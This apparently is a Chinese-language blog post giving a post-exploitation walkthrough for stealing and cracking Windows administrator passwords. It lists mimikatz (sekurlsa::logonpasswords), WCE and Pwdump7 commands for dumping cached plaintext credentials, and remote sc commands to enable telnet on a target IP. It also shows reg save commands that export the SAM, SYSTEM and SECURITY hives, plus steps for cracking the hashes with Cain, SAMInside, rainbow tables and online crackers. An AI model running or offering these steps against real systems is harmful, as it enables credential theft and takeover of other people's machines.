后渗透之破解管理员密码

一、lc5爆破用户名密码(较老,不实用)

傻瓜式安装,然后自动得到hash

 

二、 抓缓存中的明文密码(mimikatz、wce、Pwdump7等)(较实用)

MIMIKATZ:

      privilege::debug
      sekurlsa::logonpasswords

 

WCE:

    wce -w

Pwdump7:

   Pwdump7.exe

 

1、建立ipc$共享连接

2、上传需要的文件

3、设置telnet远程连接开启方式为自动,并开启telnet服务

sc \\192.168.2.132 config tlntsvr start= auto
Sc \\192.168.2.132 start tlntsvr

4、telnet远程连接服务器

Telnet 192.168.2.11

5、用mimikatz和wce获取用户名密码

Privilege::debug
sekurlsa::logonpasswords
wce32.exe  -w

三、手工导出sam相关文件,抓缓存明文或抓hash爆破(cain、saminside、Ophcrack彩虹表、在线LM-HASH破解)

cmd导出hash:

    reg save hklm\sam sam.hive
    reg save hklm\system system.hive
    reg save hklm\security security.hive

从远程主机下载文件

四、 继(三)之后,的破解工作

1、使用软件cain.

(建议用英文版CAIN来破解)

a、抓缓存明文

打开 CAIN,在”Decoders”标签下,点”LSA Secrets”, 点”+”来导入 system.hive和 security.hive.

这里一般就能看到管理员的明文密码了,当然这里的密码,有时候也是历史密码。如果尝试登录不对,可以来尝试爆破 lm/ntlm hash.

所需文件:system.hive、security.hive

b、破解hash

要破解 LM/NTLM hash,首先点”cracker”标签下的”LM&NTLM hashes”,然后点”+”,导入sam.hive,注意由于现在的win2000以后都默认使用了 syskey,所以还要导入 system.hive中的 syskey的值,然后就可以彩虹表破解了。

所需文件:Sam.hive

2、使用软件saminside

    抓明文及其hash
    依次导入sam.hive、system.hive
    所需文件:sam.hive 、system.hive

3、在没有抓到明文密码的情况下,通过抓到的hash在线破解

    http://www.cmd5.com    http://www.objectif-securite.ch/en/ophcrack.php

发表评论

电子邮件地址不会被公开。 必填项已用*标注